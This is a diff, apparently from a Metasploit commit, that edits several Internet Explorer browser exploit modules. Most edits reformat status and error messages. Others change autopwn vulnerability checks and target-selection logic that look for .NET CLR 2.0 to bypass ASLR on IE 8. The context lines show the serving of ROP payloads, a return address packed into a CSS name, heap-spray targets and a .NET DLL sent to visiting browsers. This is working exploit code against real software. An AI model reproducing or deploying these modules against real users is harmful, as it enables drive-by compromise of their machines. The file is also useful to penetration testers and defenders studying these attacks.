||||
:vuln_test => "if (/.NET CLR 2\\.0\\.50727/.test(navigator.userAgent)) { is_vuln = true }else{ is_vuln = false }",
|
||||
})
|
||||
|
||||
def initialize(info = {})
|
||||
|
@ -151,28 +153,30 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
mytarget = nil
|
||||
|
||||
agent = request.headers['User-Agent']
|
||||
#print_status("Checking user agent: #{agent}")
|
||||
if agent !~ /\.NET CLR 2\.0\.50727/
|
||||
print_error("#{cli.peerhost}:#{cli.peerport} Target machine does not have the .NET CLR 2.0.50727")
|
||||
return nil
|
||||
end
|
||||
|
||||
if agent =~ /MSIE 6\.0/
|
||||
mytarget = targets[3]
|
||||
elsif agent =~ /MSIE 7\.0/
|
||||
mytarget = targets[2]
|
||||
mytarget = ua_has_clr(cli,agent) ? targets[2] : nil
|
||||
elsif agent =~ /MSIE 8\.0/
|
||||
mytarget = targets[1]
|
||||
mytarget = ua_has_clr(cli,agent) ? targets[1] : nil
|
||||
else
|
||||
print_error("#{cli.peerhost}:#{cli.peerport} Unknown User-Agent #{agent}")
|
||||
print_error("#{cli.peerhost.ljust(16)} #{self.shortname} Unknown User-Agent #{agent}")
|
||||
end
|
||||
mytarget
|
||||
end
|
||||
|
||||
def ua_has_clr(cli, agent)
|
||||
if agent =~ /\.NET CLR 2\.0\.50727/
|
||||
return true
|
||||
end
|
||||
print_error("#{cli.peerhost.ljust(16)} #{self.shortname} Target machine does not have the .NET CLR 2.0.50727")
|
||||
false
|
||||
end
|
||||
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
|
||||
print_status("#{cli.peerhost}:#{cli.peerport} Received request for %s" % request.uri.inspect)
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Received request for %s" % request.uri.inspect)
|
||||
|
||||
mytarget = target
|
||||
if target.name == 'Automatic'
|
||||
|
@ -183,7 +187,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
end
|
||||
|
||||
#print_status("#{cli.peerhost}:#{cli.peerport} Automatically selected target: #{mytarget.name}")
|
||||
#print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Automatically selected target: #{mytarget.name}")
|
||||
|
||||
buf_addr = mytarget.ret
|
||||
css_name = [buf_addr].pack('V') * (16 / 4)
|
||||
|
@ -193,7 +197,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
uni_placeholder = Rex::Text.to_unicode(placeholder)
|
||||
|
||||
if request.uri == get_resource() or request.uri =~ /\/$/
|
||||
print_status("#{cli.peerhost}:#{cli.peerport} Sending #{self.refname} redirect")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending redirect")
|
||||
|
||||
redir = get_resource()
|
||||
redir << '/' if redir[-1,1] != '/'
|
||||
|
@ -205,7 +209,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Re-generate the payload
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
|
||||
print_status("#{cli.peerhost}:#{cli.peerport} Sending #{self.refname} HTML")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending HTML")
|
||||
|
||||
# Generate the ROP payload
|
||||
rvas = rvas_mscorie_v2()
|
||||
|
@ -309,7 +313,7 @@ EOS
|
|||
send_response(cli, html, { 'Content-Type' => 'text/html' })
|
||||
|
||||
elsif request.uri =~ /\.dll$/
|
||||
print_status("#{cli.peerhost}:#{cli.peerport} Sending #{self.refname} .NET DLL")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending .NET DLL")
|
||||
|
||||
# Generate a .NET v2.0 DLL, note that it doesn't really matter what this contains since we don't actually
|
||||
# use it's contents ...
|
||||
|
@ -340,7 +344,7 @@ EOS
|
|||
css = "\xff\xfe" + Rex::Text.to_unicode(css)
|
||||
css.gsub!(uni_placeholder, css_name)
|
||||
|
||||
print_status("#{cli.peerhost}:#{cli.peerport} Sending #{self.refname} CSS")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending CSS")
|
||||
|
||||
send_response(cli, css, { 'Content-Type' => 'text/css' })
|
||||
|
||||
|
|
|
@ -22,7 +22,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
:ua_maxver => "8.0",
|
||||
:javascript => true,
|
||||
:os_name => OperatingSystems::WINDOWS,
|
||||
:vuln_test => nil,
|
||||
# If it's IE 8, then we need .net to bypass ASLR
|
||||
:vuln_test => %Q|
|
||||
if (window.os_detect && ua_ver_eq(window.os_detect.ua_version, "8")) {
|
||||
if (/.NET CLR 2\\.0\\.50727/.test(navigator.userAgent)){ is_vuln = true }else{ is_vuln = false }
|
||||
}
|
||||
|,
|
||||
})
|
||||
|
||||
def initialize(info={})
|
||||
|
@ -153,7 +158,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
mytarget = auto_target(cli, request)
|
||||
if mytarget.nil?
|
||||
agent = request.headers['User-Agent']
|
||||
print_error("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}")
|
||||
print_error("#{cli.peerhost.ljust(16)} #{self.shortname} Unknown User-Agent #{agent}")
|
||||
send_not_found(cli)
|
||||
return
|
||||
end
|
||||
|
@ -175,7 +180,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
</html>
|
||||
DATA
|
||||
|
||||
print_status("Triggering #{self.name} vulnerability at #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Triggering vulnerability (target: #{mytarget.name})...")
|
||||
send_response(cli, data, { 'Content-Type' => 'text/html' })
|
||||
return
|
||||
end
|
||||
|
@ -297,7 +302,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
</html>
|
||||
HTML
|
||||
|
||||
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport} (#{mytarget.name})...")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending exploit (#{mytarget.name})...")
|
||||
send_response(cli, html, {'Content-Type'=>'text/html'})
|
||||
end
|
||||
end
|
||||
|
|
|
@ -120,7 +120,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
</html>
|
||||
|
|
||||
|
||||
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending exploit HTML...")
|
||||
|
||||
# Transmit the response to the client
|
||||
send_response_html(cli, content)
|
||||
|
|
|
@ -19,6 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
autopwn_info({
|
||||
:os_name => OperatingSystems::WINDOWS,
|
||||
:ua_name => HttpClients::IE,
|
||||
:rank => NormalRanking,
|
||||
:vuln_test => nil,
|
||||
})
|
||||
|
@ -90,11 +91,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
mytarget = nil
|
||||
|
||||
agent = request.headers['User-Agent']
|
||||
#print_status("Checking user agent: #{agent}")
|
||||
if agent =~ /MSIE 6\.0/ or agent =~ /MSIE 7\.0/ or agent =~ /MSIE 8\.0/
|
||||
mytarget = targets[1]
|
||||
else
|
||||
print_error("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}")
|
||||
print_error("#{cli.peerhost.ljust(16)} #{self.shortname} Unknown User-Agent #{agent}")
|
||||
end
|
||||
mytarget
|
||||
end
|
||||
|
@ -111,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
if request.uri == get_resource() or request.uri =~ /\/$/
|
||||
print_status("Sending #{self.refname} redirect to #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending redirect (target: #{mytarget.name})...")
|
||||
|
||||
redir = get_resource()
|
||||
redir << '/' if redir[-1,1] != '/'
|
||||
|
@ -123,7 +123,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Re-generate the payload
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
|
||||
print_status("Sending #{self.refname} HTML to #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending HTML (target: #{mytarget.name})...")
|
||||
|
||||
# Generate the ROP payload
|
||||
buf_addr = mytarget['SprayTarget']
|
||||
|
@ -205,7 +205,7 @@ EOS
|
|||
send_response_html(cli, content)
|
||||
|
||||
elsif request.uri =~ /\.dll$/
|
||||
print_status("Sending #{self.refname} DLL to #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending DLL (target: #{mytarget.name})...")
|
||||
|
||||
# Generate a .NET v2.0 DLL, note that it doesn't really matter what this contains since we don't actually
|
||||
# use it's contents ...
|
||||
|
|
Loading…
Reference in New Issue